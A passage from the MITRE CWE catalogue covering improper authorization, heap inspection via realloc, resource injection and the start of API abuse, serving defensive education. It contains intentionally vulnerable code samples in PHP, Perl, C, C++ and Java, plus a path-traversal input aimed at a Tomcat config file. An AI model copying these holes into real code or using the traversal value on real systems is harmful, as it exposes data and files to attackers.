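    // Only the catalogs the application actually uses; everything else is rejected.
    private static final Set<String> ALLOWED_CATALOGS = Set.of("sales", "inventory");

    public static void selectCatalog(Connection conn, String requested) throws SQLException {
        if (requested == null || !ALLOWED_CATALOGS.contains(requested)) {
            throw new IllegalArgumentException("Unsupported catalog");
        }
        conn.setCatalog(requested); // the setting is chosen by the application, not the attacker
    }
}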

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class20Improper Input Validation
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness ClassWeakness Class610Externally Controlled Reference to a Resource in Another Sphere
Research Concepts1000
ChildOfWeakness ClassWeakness Class642External Control of Critical State Data
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfCategoryCategory994SFP Secondary Cluster: Tainted Input to Variable
Software Fault Pattern (SFP) Clusters (primary)888
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsSetting Manipulation
Software Fault PatternsSFP25Tainted input to variable
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Description
2009-01-12CWE Content TeamMITREInternal
updated Relationships
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-10-29CWE Content TeamMITREInternal
updated Modes_of_Introduction, Other_Notes
2010-04-05CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-06-27CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-02-21CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2017-01-19CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Setting Manipulation

CWE-285: Improper Authorization

Weakness ID: 285
Abstraction: Class
Status: Draft
+ Description

Description Summary

The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.

Extended Description

Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource.

When access control checks are not applied consistently - or not at all - users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution.

+ Alternate Terms
AuthZ:

"AuthZ" is typically used as an abbreviation of "authorization" within the web application security community. It is also distinct from "AuthC," which is an abbreviation of "authentication." The use of "Auth" as an abbreviation is discouraged, since it could be used for either authentication or authorization.

+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

Language-independent

Technology Classes

Web-Server: (Often)

Database-Server: (Often)

+ Modes of Introduction

A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies.

Authorization weaknesses may arise when a single-user application is ported to a multi-user environment.

+ Common Consequences
ScopeEffect
Confidentiality

Technical Impact: Read application data; Read files or directories

An attacker could read sensitive data, either by reading the data directly from a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to read the data.

Integrity

Technical Impact: Modify application data; Modify files or directories

An attacker could modify sensitive data, either by writing the data directly to a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to write the data.

Access Control

Technical Impact: Gain privileges / assume identity

An attacker could gain privileges by modifying or reading critical data directly, or by accessing insufficiently-protected, privileged functionality.

+ Likelihood of Exploit

High

+ Detection Methods

Automated Static Analysis

Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.

Generally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives.

Effectiveness: Limited

Automated Dynamic Analysis

Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic.

Manual Analysis

This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.

Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms.

Effectiveness: Moderate

These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints.

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Host Application Interface Scanner

  • Fuzz Tester

  • Framework-based Fuzzer

  • Forced Path Execution

  • Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR Partial

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR Partial

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

This function runs an arbitrary SQL query on a given database, returning the result of the query.

(Bad Code)
Example Language: PHP 
function runEmployeeQuery($dbName, $name){
    mysql_select_db($dbName, $globalDbHandle) or die("Could not open Database" . $dbName);
    //Use a prepared statement to avoid CWE-89
    $preparedStatement = $globalDbHandle->prepare('SELECT * FROM employees WHERE name = :name');
    $preparedStatement->execute(array(':name' => $name));
    return $preparedStatement->fetchAll();
}
/.../
$employeeRecord = runEmployeeQuery('EmployeeDB', $_GET['EmployeeName']);

While this code is careful to avoid SQL injection, the function does not confirm that the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database.

Example 2

The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory.

(Bad Code)
Example Language: Perl 
sub DisplayPrivateMessage {
    my($id) = @_;
    my $Message = LookupMessageObject($id);
    print "From: " . encodeHTML($Message->{from}) . "<br>\n";
    print "Subject: " . encodeHTML($Message->{subject}) . "\n";
    print "<hr>\n";
    print "Body: " . encodeHTML($Message->{body}) . "\n";
}

my $q = new CGI;
# For purposes of this example, assume that CWE-309 and
# CWE-523 do not apply.
if (! AuthenticateUser($q->param('username'), $q->param('password'))) {
    ExitError("invalid username or password");
}

my $id = $q->param('id');
DisplayPrivateMessage($id);

While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users.

One way to avoid this problem would be to ensure that the "to" field in the message object matches the username of the authenticated user.

+ Observed Examples
ReferenceDescription
Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords.
Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users.
Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request.
Terminal server does not check authorization for guest access.
Database server does not use appropriate privileges for certain sensitive operations.
Gateway uses default "Allow" configuration for its authorization settings.
Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.
Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.
System monitoring software allows users to bypass authorization by creating custom forms.
Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.
Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.
Content management system does not check access permissions for private files, allowing others to view those files.
ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.
Product does not check the ACL of a page accessed using an "include" directive, allowing attackers to read unauthorized files.
Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries.
Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.
OS kernel does not check for a certain privilege before setting ACLs for files.
Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.
Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.
+ Potential Mitigations

Phase: Architecture and Design

Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) to enforce the roles at the appropriate boundaries.

Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
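
A minimal Java sketch of both checks, loosely based on the bulletin-board scenario in Example 2 above (the Message record, role name, and method names are illustrative assumptions): the role check enforces the vertical boundary, and the ownership check addresses the horizontal case noted above.

(Good Code)
Example Language: Java
import java.util.Set;

public class MessageService {
    // Illustrative record: the intended recipient and the message body.
    record Message(String to, String body) {}

    public static Message readMessage(String username, Set<String> roles, Message m) {
        if (!roles.contains("user")) {
            // Vertical check: the caller must hold a role that may read messages at all.
            throw new SecurityException("Caller lacks the required role");
        }
        if (!m.to().equals(username)) {
            // Horizontal check: the message must be addressed to the authenticated caller.
            throw new SecurityException("Message is not addressed to this user");
        }
        return m;
    }
}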

Phase: Architecture and Design

Ensure that you perform access control checks related to your business logic. These checks may be different than the access control checks that you apply to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor.

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, consider using authorization frameworks such as the JAAS Authorization Framework [R.285.5] and the OWASP ESAPI Access Control feature [R.285.4].

Phase: Architecture and Design

For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.

One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.

Phases: System Configuration; Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

+ Background Details

An access control list (ACL) represents who or what has permissions to a given object. Different operating systems implement ACLs in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users, where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: "No access", "Read access", "Change access", and "Full control". Windows NT extends the UNIX concept of three classes of users to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object.
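
As a small illustration of the UNIX permission classes described above, the following Java sketch restricts a file to its owner; it assumes a filesystem that supports POSIX file attributes, and the class name is an illustrative assumption.

(Good Code)
Example Language: Java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.attribute.PosixFilePermissions;

public class OwnerOnly {
    // Grant read/write to the owner and nothing to the group owner or other users.
    public static void restrict(Path file) throws IOException {
        Files.setPosixFilePermissions(file, PosixFilePermissions.fromString("rw-------"));
    }
}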

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory254Security Features
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness ClassWeakness Class284Improper Access Control
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory721OWASP Top Ten 2007 Category A10 - Failure to Restrict URL Access
Weaknesses in OWASP Top Ten (2007) (primary)629
ChildOfCategoryCategory723OWASP Top Ten 2004 Category A2 - Broken Access Control
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory7532009 Top 25 - Porous Defenses
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory8032010 Top 25 - Porous Defenses
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory817OWASP Top Ten 2010 Category A8 - Failure to Restrict URL Access
Weaknesses in OWASP Top Ten (2010) (primary)809
ChildOfCategoryCategory840Business Logic Errors
Development Concepts699
ChildOfCategoryCategory935OWASP Top Ten 2013 Category A7 - Missing Function Level Access Control
Weaknesses in OWASP Top Ten (2013) (primary)928
ChildOfCategoryCategory945SFP Secondary Cluster: Insecure Resource Access
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness VariantWeakness Variant219Sensitive Data Under Web Root
Research Concepts (primary)1000
ParentOfWeakness ClassWeakness Class732Incorrect Permission Assignment for Critical Resource
Research Concepts (primary)1000
ParentOfWeakness ClassWeakness Class862Missing Authorization
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness ClassWeakness Class863Incorrect Authorization
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant926Improper Export of Android Application Components
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant927Use of Implicit Intent for Sensitive Communication
Development Concepts (primary)699
Research Concepts (primary)1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsMissing Access Control
OWASP Top Ten 2007A10CWE More SpecificFailure to Restrict URL Access
OWASP Top Ten 2004A2CWE More SpecificBroken Access Control
Software Fault PatternsSFP35Insecure resource access
+ References
[R.285.1] NIST. "Role Based Access Control and Role Based Security". <http://csrc.nist.gov/groups/SNS/rbac/>.
[R.285.2] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 4, "Authorization" Page 114; Chapter 6, "Determining Appropriate Access Control" Page 171. 2nd Edition. Microsoft. 2002.
[R.285.3] Frank Kim. "Top 25 Series - Rank 5 - Improper Access Control (Authorization)". SANS Software Security Institute. 2010-03-04. <http://blogs.sans.org/appsecstreetfighter/2010/03/04/top-25-series-rank-5-improper-access-control-authorization/>.
[R.285.4] [REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
[R.285.5] [REF-23] Rahul Bhattacharjee. "Authentication using JAAS". <http://www.javaranch.com/journal/2008/04/authentication-using-JAAS.html>.
[R.285.6] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 2, "Common Vulnerabilities of Authorization", Page 39. 1st Edition. Addison Wesley. 2006.
[R.285.7] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 11, "ACL Inheritance", Page 649. 1st Edition. Addison Wesley. 2006.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-08-15VeracodeExternal
Suggested OWASP Top Ten 2004 mapping
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, References, Relationships
2009-03-10CWE Content TeamMITREInternal
updated Potential_Mitigations
2009-05-27CWE Content TeamMITREInternal
updated Description, Related_Attack_Patterns
2009-07-27CWE Content TeamMITREInternal
updated Relationships
2009-10-29CWE Content TeamMITREInternal
updated Type
2009-12-28CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Relationships
2010-02-16CWE Content TeamMITREInternal
updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, References, Relationships
2010-09-27CWE Content TeamMITREInternal
updated Description
2011-03-24
(Critical)
CWE Content TeamMITREInternal
Changed name and description; clarified difference between "access control" and "authorization."
2011-03-29CWE Content TeamMITREInternal
updated Background_Details, Demonstrative_Examples, Description, Name, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Observed_Examples, Relationships
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-07-17CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2009-01-12Missing or Inconsistent Access Control
2011-03-29Improper Access Control (Authorization)

CWE-244: Improper Clearing of Heap Memory Before Release ('Heap Inspection')

Weakness ID: 244
Abstraction: Variant
Status: Draft
+ Description

Description Summary

Using realloc() to resize buffers that store sensitive information can leave the sensitive information exposed to attack, because it is not removed from memory.

Extended Description

When sensitive data such as a password or an encryption key is not removed from memory, it could be exposed to an attacker using a "heap inspection" attack that reads the sensitive data using memory dumps or other methods. The realloc() function is commonly used to increase the size of a block of allocated memory. This operation often requires copying the contents of the old memory block into a new and larger block. This operation leaves the contents of the original block intact but inaccessible to the program, preventing the program from being able to scrub sensitive data from memory. If an attacker can later examine the contents of a memory dump, the sensitive data could be exposed.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

C

C++

+ Common Consequences
ScopeEffect
Confidentiality
Other

Technical Impact: Read memory; Other

Sensitive data, such as a password or an encryption key, that remains in heap memory after a realloc() can be exposed to an attacker who is able to examine a memory dump or otherwise inspect process memory.

+ Demonstrative Examples

Example 1

The following code calls realloc() on a buffer containing sensitive data:

(Bad Code)
Example Language: C
cleartext_buffer = get_secret();
...
cleartext_buffer = realloc(cleartext_buffer, 1024);
...
scrub_memory(cleartext_buffer, 1024);

There is an attempt to scrub the sensitive data from memory, but realloc() is used, so a copy of the data can still be exposed in the memory originally allocated for cleartext_buffer.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness BaseWeakness Base226Sensitive Information Uncleared Before Release
Research Concepts (primary)1000
ChildOfWeakness ClassWeakness Class227Improper Fulfillment of API Contract ('API Abuse')
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory633Weaknesses that Affect Memory
Resource-specific Weaknesses (primary)631
ChildOfCategoryCategory742CERT C Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory876CERT C++ Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory963SFP Secondary Cluster: Exposed Data
Software Fault Pattern (SFP) Clusters (primary)888
CanPrecedeWeakness ClassWeakness Class669Incorrect Resource Transfer Between Spheres
Research Concepts1000
MemberOfViewView630Weaknesses Examined by SAMATE
Weaknesses Examined by SAMATE (primary)630
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
+ Affected Resources
  • Memory
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsHeap Inspection
CERT C Secure CodingMEM03-CClear sensitive information stored in reusable resources returned for reuse
CERT C++ Secure CodingMEM03-CPPClear sensitive information stored in returned reusable resources
Software Fault PatternsSFP23Exposed Data
+ White Box Definitions

A weakness where the code path has:

1. a start statement that stores information in a buffer,

2. an end statement that resizes the buffer, and

3. a path between them that does not contain a statement that clears the buffer

+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-08-01KDM AnalyticsExternal
added/updated white box definitions
2008-09-08CWE Content TeamMITREInternal
updated Applicable_Platforms, Name, Relationships, Other_Notes, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Relationships
2008-11-24CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples, Name
2009-10-29CWE Content TeamMITREInternal
updated Common_Consequences, Description, Other_Notes
2010-12-13CWE Content TeamMITREInternal
updated Name
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Heap Inspection
2008-09-09Failure to Clear Heap Memory Before Release
2009-05-27Failure to Clear Heap Memory Before Release (aka 'Heap Inspection')
2010-12-13Failure to Clear Heap Memory Before Release ('Heap Inspection')

CWE-99: Improper Control of Resource Identifiers ('Resource Injection')

Weakness ID: 99
Abstraction: Base
Status: Draft
+ Description

Description Summary

The software receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control.

Extended Description

A resource injection issue occurs when the following two conditions are met:

  1. An attacker can specify the identifier used to access a system resource. For example, an attacker might be able to specify part of the name of a file to be opened or a port number to be used.

  2. By specifying the resource, the attacker gains a capability that would not otherwise be permitted. For example, the program may give the attacker the ability to overwrite the specified file, run with a configuration controlled by the attacker, or transmit sensitive information to a third-party server.

This may enable an attacker to access or modify otherwise protected system resources.

+ Alternate Terms
Insecure Direct Object Reference:

OWASP uses this term, although it is effectively the same as resource injection.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

All

+ Common Consequences
ScopeEffect
Confidentiality
Integrity

Technical Impact: Read application data; Modify application data; Read files or directories; Modify files or directories

An attacker could gain access to or modify sensitive data or system resources. This could allow access to protected files or directories including configuration files and files containing sensitive information.

+ Likelihood of Exploit

High

+ Demonstrative Examples

Example 1

The following Java code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as "../../tomcat/conf/server.xml", which causes the application to delete one of its own configuration files.

(Bad Code)
Example Language: Java 
String rName = request.getParameter("reportName");
File rFile = new File("/usr/local/apfr/reports/" + rName);
...
rFile.delete();

Example 2

The following code uses input from the command line to determine which file to open and echo back to the user. If the program runs with privileges, malicious users can supply an arbitrary path (including a path that resolves through a symbolic link) and use the program to read the first part of any file on the system.

(Bad Code)
Example Language: C++ 
ifstream ifs(argv[1]);
string s;
ifs >> s;
cout << s;

The kind of resource the data affects indicates the kind of content that may be dangerous. For example, data containing special characters like period, slash, and backslash, are risky when used in methods that interact with the file system. (Resource injection, when it is related to file system resources, sometimes goes by the name "path manipulation.") Similarly, data that contains URLs and URIs is risky for functions that create remote connections.

+ Potential Mitigations

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
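
A minimal Java sketch of this strategy for one kind of resource identifier, a port number as mentioned in the extended description; the class name and allowed values are illustrative assumptions.

(Good Code)
Example Language: Java
import java.util.Set;

public class PortValidator {
    // Only the ports this application is expected to use.
    private static final Set<Integer> ALLOWED_PORTS = Set.of(8080, 8443);

    public static int parsePort(String input) {
        int port = Integer.parseInt(input.trim()); // non-numeric input is rejected here
        if (!ALLOWED_PORTS.contains(port)) {
            throw new IllegalArgumentException("Port is not in the allowed set");
        }
        return port;
    }
}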

+ Other Notes

Note: Resource injection that involves resources stored on the filesystem goes by the name path manipulation and is reported in a separate category. See the path manipulation description for further details of this vulnerability.

+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class74Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory813OWASP Top Ten 2010 Category A4 - Insecure Direct Object References
Weaknesses in OWASP Top Ten (2010) (primary)809
ChildOfCategoryCategory932OWASP Top Ten 2013 Category A4 - Insecure Direct Object References
Weaknesses in OWASP Top Ten (2013) (primary)928
ChildOfCategoryCategory990SFP Secondary Cluster: Tainted Input to Command
Software Fault Pattern (SFP) Clusters (primary)888
ChildOfCategoryCategory1005Input Validation and Representation
Seven Pernicious Kingdoms (primary)700
PeerOfWeakness ClassWeakness Class706Use of Incorrectly-Resolved Name or Reference
Research Concepts1000
CanAlsoBeWeakness ClassWeakness Class73External Control of File Name or Path
Research Concepts1000
ParentOfWeakness BaseWeakness Base641Improper Restriction of Names for Files and Other Resources
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base694Use of Multiple Resources with Duplicate Identifier
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ParentOfWeakness BaseWeakness Base914Improper Control of Dynamically-Identified Variables
Development Concepts699
Research Concepts (primary)1000
MemberOfViewView630Weaknesses Examined by SAMATE
Weaknesses Examined by SAMATE (primary)630
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
+ Relationship Notes

Resource injection that involves resources stored on the filesystem goes by the name path manipulation (CWE-73).

+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsResource Injection
Software Fault PatternsSFP24Tainted input to command
+ White Box Definitions

A weakness where the code path has:

1. a start statement that accepts input, followed by

2. a statement that allocates a System Resource using a name that includes the input, and

3. an end statement that accesses the System Resource, where

a. the name of the System Resource violates protection

+ Maintenance Notes

The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 "Resource Injection," as originally defined in the Seven Pernicious Kingdoms taxonomy, emphasizes the "identifier used to access a system resource" such as a file name or port number, yet it explicitly states that the "resource injection" term does not apply to "path manipulation," which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer.

+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-08-01KDM AnalyticsExternal
added/updated white box definitions
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2009-05-27CWE Content TeamMITREInternal
updated Description, Name
2009-07-17KDM AnalyticsExternal
Improved the White_Box_Definition
2009-07-27CWE Content TeamMITREInternal
updated White_Box_Definitions
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Other_Notes
2012-05-11CWE Content TeamMITREInternal
updated Common_Consequences, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-02-21CWE Content TeamMITREInternal
updated Alternate_Terms, Maintenance_Notes, Other_Notes, Relationships
2013-07-17CWE Content TeamMITREInternal
updated Relationships
2014-06-23CWE Content TeamMITREInternal
updated Alternate_Terms, Description, Relationship_Notes, Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Relationships
2017-05-03CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Resource Injection
2009-05-27Insufficient Control of Resource Identifiers (aka 'Resource Injection')

CWE-227: Improper Fulfillment of API Contract ('API Abuse')

Weakness ID: 227
Abstraction: Class
Status: Draft
+ Description

Description Summary

The software uses an API in a manner contrary to its intended use.

Extended Description

An API is a contract between a caller and a callee. The most common forms of API misuse occur when the caller does not honor its end of this contract. For example, if a program does not call chdir() after calling chroot(), it violates the contract that specifies how to change the active root directory in a secure fashion. Another good example of library abuse is expecting the callee to return trustworthy DNS information to the caller. In this case, the caller misuses the callee API by making certain assumptions about its behavior (that the return value can be used for authentication purposes). One can also violate the caller-callee contract from the other side. For example, if a coder subclasses SecureRandom and returns a non-random value, the contract is violated.
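
The callee-side violation mentioned above can be sketched in Java; the subclass name is an illustrative assumption.

(Bad Code)
Example Language: Java
import java.security.SecureRandom;
import java.util.Arrays;

// Violates the implicit contract of SecureRandom: callers expect unpredictable output,
// but this subclass returns a constant fill, so any key or token built from it is predictable.
public class NotSoSecureRandom extends SecureRandom {
    @Override
    public void nextBytes(byte[] bytes) {
        Arrays.fill(bytes, (byte) 0x41);
    }
}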

+ Alternate Terms
API Abuse
+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Common Consequences
